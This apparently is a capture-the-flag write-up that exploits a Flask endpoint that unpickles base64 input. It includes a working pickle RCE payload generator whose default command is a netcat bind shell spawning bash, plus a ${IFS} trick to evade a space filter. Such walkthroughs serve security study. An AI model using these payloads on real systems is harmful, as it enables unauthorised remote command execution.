APIv2 @ 2020 - You think you got methods for this? ---> POST method
The POST request returns a Flask error, which occurred because no data was sent.
I added :D as the payload and got a new error.
It tries to b64decode my input.
Description:
A rundown, informally known as a pickle or the hotbox, is a situation in the game of baseball that occurs when the baserunner is stranded
The description (a rundown is informally called a "pickle") and the base64 error together suggest that the server base64-decodes the POST body and then unpickles it.
Basic pickle payload, taken from
https://gist.github.com/mgeeky/cbc7017986b2ec3e247aab0b01a9edcd
#!/usr/bin/env python3
#
# Pickle deserialization RCE payload.
# To be invoked with the command to execute as its first parameter.
# Otherwise, the default one will be used.
#
# (The original gist targets Python 2 and imports cPickle; this version
# uses the Python 3 pickle module and decodes the base64 bytes to text
# so the output can be pasted straight into a request body.)
import base64
import pickle
import sys

DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND


class PickleRce(object):
    # __reduce__ tells pickle how to rebuild the object: "call os.system
    # with COMMAND". pickle.loads() on the server runs that call.
    def __reduce__(self):
        import os
        return (os.system, (COMMAND,))


print(base64.b64encode(pickle.dumps(PickleRce())).decode())
Using the output of this script as the payload returned a response saying that no spaces are allowed.
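To see why the space check fires and how a payload can get past it, here is an added, self-contained example (my code, not the challenge's and not the gist's). The `mock_endpoint` function is an assumption about the server: the writeup never shows its code, so the mock simply reproduces the three observed responses (no data, bad base64, "no space allowed") and then calls `pickle.loads`. The space check is assumed to run on the decoded pickle bytes, since base64 output itself can never contain a space. The `strip_spaces` helper goes beyond the writeup: it swaps each space for the shell's `${IFS}` expansion, which contains no space byte when inspected but is expanded to whitespace by `/bin/sh` when `os.system` finally runs the command.

```python
#!/usr/bin/env python3
# Added example (not from the writeup): a local model of the pickle endpoint
# described above, plus a payload builder that avoids the rejected space byte.
import base64
import os
import pickle


class PickleRce:
    """Object whose unpickling calls os.system(command) (the __reduce__ trick)."""

    def __init__(self, command: str):
        self.command = command

    def __reduce__(self):
        # pickle.loads() evaluates os.system(self.command) while rebuilding us
        return (os.system, (self.command,))


def build_payload(command: str) -> str:
    """Base64 of a protocol-0 pickle. Protocol 0 is text-only (no binary
    length fields), so the only place a 0x20 byte can appear in the pickle
    is inside the command string itself."""
    return base64.b64encode(pickle.dumps(PickleRce(command), protocol=0)).decode()


def decoded_has_space(payload_b64: str) -> bool:
    """What a 'no space allowed' filter on the decoded body would see."""
    return b" " in base64.b64decode(payload_b64)


def strip_spaces(command: str) -> str:
    """Replace shell word separators with ${IFS}. /bin/sh expands ${IFS}
    to whitespace and field-splits the result at run time, i.e. after any
    byte-level space check on the pickle has already passed."""
    return command.replace(" ", "${IFS}")


def mock_endpoint(payload_b64: str):
    """Hypothetical stand-in for the challenge's POST handler (assumption:
    the real check is not shown in the writeup). It mirrors the observed
    behaviour: no data -> error, not base64 -> error, space in decoded
    data -> error, otherwise unpickle (the deliberate vulnerability)."""
    if not payload_b64:
        return "error: no data"
    try:
        raw = base64.b64decode(payload_b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "error: invalid base64"
    if b" " in raw:
        return "error: no space allowed"
    return pickle.loads(raw)  # runs os.system(command); returns its status


if __name__ == "__main__":
    # Harmless commands are used here; 'test -d /' exits 0 on any POSIX box.
    naive = build_payload("test -d /")
    print("naive payload:", mock_endpoint(naive))
    fixed = build_payload(strip_spaces("test -d /"))
    print("space-free payload, os.system status:", mock_endpoint(fixed))
```

The `${IFS}` substitution only helps when the command is interpreted by a shell, which is the case for `os.system`; if the target unpickled into `subprocess` with a list of arguments, the same trick would not apply. Protocol 0 is chosen on purpose: with protocol 2 or later, a string length of exactly 32 would itself be serialised as a 0x20 byte and trip the filter regardless of the command.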